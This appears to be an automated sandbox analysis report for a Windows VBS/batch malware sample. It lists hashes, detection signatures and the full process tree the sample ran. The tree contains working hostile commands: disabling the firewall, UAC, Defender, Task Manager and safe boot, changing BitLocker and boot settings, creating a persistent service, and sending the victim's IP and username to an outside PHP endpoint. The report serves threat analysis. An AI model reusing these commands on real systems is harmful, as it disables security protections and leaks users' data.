Analysis
-
max time kernel
72s -
max time network
79s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
19-05-2024 15:03
Static task
static1
Behavioral task
behavioral1
Sample
malware.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
malware.vbs
Resource
win10v2004-20240508-en
General
-
Target
malware.vbs
-
Size
6KB
-
MD5
23878a8e1e67a80e987c44a81e7a886d
-
SHA1
0330d6990bec48a65a1e359ebc1c9f51749e121d
-
SHA256
f1ad1ad54bbbb321cc210f44bc0c7d16f73a56f33964c9c0aa5f822c43302941
-
SHA512
c6948d90fb144a91f5d2b910314c04e91b0c3e22f6f9e8031ad3639803808420d7c80d35319ad1ac5e7adf810de019ec61434692f5a4bdff678bc39776f3189d
-
SSDEEP
96:qDfYNb8mN8r9f4PPfMSHnx2gqoij8RW8E/zmdPzWdEKuWP2W9NukS/MNa:qDfYqrZgX7yrCdPidfbU0a
Malware Config
Signatures
-
Processes:
reg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
Processes:
bcdedit.exebcdedit.exebcdedit.exebcdedit.exepid process 5532 bcdedit.exe 5548 bcdedit.exe 5560 bcdedit.exe 5648 bcdedit.exe -
Creates new service(s) 2 TTPs
-
Disables RegEdit via registry modification 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe -
Disables Task Manager via registry modification
-
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid process 5400 netsh.exe 5952 netsh.exe -
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exepid process 2192 icacls.exe 5388 takeown.exe 2900 icacls.exe 544 takeown.exe 5212 icacls.exe 5812 takeown.exe 5848 icacls.exe 2532 takeown.exe -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exepid process 5812 takeown.exe 5848 icacls.exe 2532 takeown.exe 2192 icacls.exe 5388 takeown.exe 2900 icacls.exe 544 takeown.exe 5212 icacls.exe -
Drops file in System32 directory 21 IoCs
Processes:
OpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db OpenWith.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exepid process 5564 sc.exe 5796 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exeipconfig.exepid process 5880 ipconfig.exe 5844 ipconfig.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exeOpenWith.exereg.exereg.exereg.exeLogonUI.execmd.exereg.exereg.exereg.exereg.exeOpenWith.exeOpenWith.exereg.exeOpenWith.exereg.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer reg.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop reg.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer reg.exe Key created \REGISTRY\USER\.DEFAULT\Software reg.exe Set value (data) \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\PreferredUILanguages = 720075002d005200550000000000 reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Control Panel\International\sLanguage = "rus" reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableGPO = "1" reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\ieframe.dll,-55175 = "Internet Explorer" OpenWith.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System reg.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel reg.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System\DisableCMD = "2" reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "137" LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E44E9428-BDBC-4987-A099-40DC8FD255E7} {7F9185B0-CB92-43C5-80A9-92277A4F7B54} 0xFFFF = 0100000000000000e2697c0c7ad8cd01 cmd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1" reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe Key created \REGISTRY\USER\.DEFAULT\Software reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisableSettingsPage = "1" reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache\ reg.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached reg.exe Key created \REGISTRY\USER\S-1-5-18_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-18_Classes\Local Settings OpenWith.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached cmd.exe Key created \REGISTRY\USER\S-1-5-18_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-18_Classes\Local Settings OpenWith.exe Set value (str) \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache\en-US = "0c09" reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer cmd.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" cmd.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\Languages reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows reg.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = 6024b221ea3a6910a2dc08002b30309d9c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 cmd.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\Languages reg.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache reg.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\International reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System\DisableGPO = "1" reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoExplorer = "1" reg.exe Key created \REGISTRY\USER\S-1-5-18_Classes\Local Settings OpenWith.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache\ru-RU = "0419" reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (str) \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\ reg.exe -
Runs net.exe
-
Suspicious use of AdjustPrivilegeToken 26 IoCs
Processes:
powercfg.exepowercfg.exepowercfg.exepowercfg.execmd.exewhoami.exetakeown.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exewhoami.exetakeown.exetakeown.exetakeown.exeshutdown.exedescription pid process Token: SeShutdownPrivilege 2996 powercfg.exe Token: SeCreatePagefilePrivilege 2996 powercfg.exe Token: SeShutdownPrivilege 412 powercfg.exe Token: SeCreatePagefilePrivilege 412 powercfg.exe Token: SeShutdownPrivilege 2824 powercfg.exe Token: SeCreatePagefilePrivilege 2824 powercfg.exe Token: SeShutdownPrivilege 4512 powercfg.exe Token: SeCreatePagefilePrivilege 4512 powercfg.exe Token: SeSystemtimePrivilege 4188 cmd.exe Token: SeSystemtimePrivilege 4188 cmd.exe Token: SeDebugPrivilege 5956 whoami.exe Token: SeTakeOwnershipPrivilege 5388 takeown.exe Token: SeShutdownPrivilege 5764 powercfg.exe Token: SeCreatePagefilePrivilege 5764 powercfg.exe Token: SeShutdownPrivilege 5808 powercfg.exe Token: SeCreatePagefilePrivilege 5808 powercfg.exe Token: SeShutdownPrivilege 5856 powercfg.exe Token: SeCreatePagefilePrivilege 5856 powercfg.exe Token: SeShutdownPrivilege 5868 powercfg.exe Token: SeCreatePagefilePrivilege 5868 powercfg.exe Token: SeDebugPrivilege 3152 whoami.exe Token: SeTakeOwnershipPrivilege 544 takeown.exe Token: SeTakeOwnershipPrivilege 5812 takeown.exe Token: SeTakeOwnershipPrivilege 2532 takeown.exe Token: SeShutdownPrivilege 4720 shutdown.exe Token: SeRemoteShutdownPrivilege 4720 shutdown.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
OpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeLogonUI.exepid process 5704 OpenWith.exe 5892 OpenWith.exe 5124 OpenWith.exe 384 OpenWith.exe 2804 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exenet.exedescription pid process target process PID 4188 wrote to memory of 516 4188 cmd.exe net.exe PID 4188 wrote to memory of 516 4188 cmd.exe net.exe PID 516 wrote to memory of 5088 516 net.exe net1.exe PID 516 wrote to memory of 5088 516 net.exe net1.exe PID 4188 wrote to memory of 3672 4188 cmd.exe msedge.exe PID 4188 wrote to memory of 3672 4188 cmd.exe msedge.exe PID 4188 wrote to memory of 2996 4188 cmd.exe powercfg.exe PID 4188 wrote to memory of 2996 4188 cmd.exe powercfg.exe PID 4188 wrote to memory of 412 4188 cmd.exe powercfg.exe PID 4188 wrote to memory of 412 4188 cmd.exe powercfg.exe PID 4188 wrote to memory of 2824 4188 cmd.exe powercfg.exe PID 4188 wrote to memory of 2824 4188 cmd.exe powercfg.exe PID 4188 wrote to memory of 4512 4188 cmd.exe powercfg.exe PID 4188 wrote to memory of 4512 4188 cmd.exe powercfg.exe PID 4188 wrote to memory of 5400 4188 cmd.exe netsh.exe PID 4188 wrote to memory of 5400 4188 cmd.exe netsh.exe PID 4188 wrote to memory of 5444 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5444 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5464 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5464 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5480 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5480 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5496 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5496 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5512 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5512 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5528 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5528 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5544 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5544 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5560 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5560 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5576 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5576 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5592 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5592 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5608 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5608 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5624 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5624 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5640 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5640 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5656 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5656 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5672 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5672 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5688 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5688 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5704 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5704 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5720 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5720 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5736 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5736 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5752 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5752 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5768 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5768 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5784 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5784 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5800 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5800 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5816 4188 cmd.exe reg.exe PID 4188 wrote to memory of 5816 4188 cmd.exe reg.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\malware.vbs"1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4028,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=4292 /prefetch:81⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\malware.bat" "1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.perfect.wuaze.com/guardar_ip.php?id=12342⤵
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\reg.exeREG IMPORT "C:\Users\Admin\AppData\Local\Temp\disable_winload.reg"2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- UAC bypass
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f2⤵
- Disables RegEdit via registry modification
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig | findstr IPv42⤵
-
C:\Windows\system32\ipconfig.exeipconfig3⤵
- Gathers network information
-
C:\Windows\system32\findstr.exefindstr IPv43⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.perfect.wuaze.com/guardar_ip.php?id=10.127.0.1062⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c whoami2⤵
-
C:\Windows\system32\whoami.exewhoami3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=132⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=gylqwjcn\admin2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net user "Admin"2⤵
-
C:\Windows\system32\net.exenet user "Admin"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user "Admin"4⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\notepad.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\manage-bde.exemanage-bde -off C:2⤵
-
C:\Windows\system32\manage-bde.exemanage-bde -on C: -exclude "C:\Windows" -exclude "C:\Users" -exclude "C:\Program Files" -exclude "C:\Program Files (x86)"2⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled yes2⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\sc.exesc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"2⤵
- Launches sc.exe
-
C:\Windows\system32\net.exenet start MiServicio2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start MiServicio3⤵
-
C:\Windows\system32\takeown.exetakeown /F "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe" /grant administrators:F2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\shutdown.exeshutdown /r /t 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=3984,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=4688 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=3992,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=5028 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --field-trial-handle=4972,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=5268 /prefetch:11⤵
-
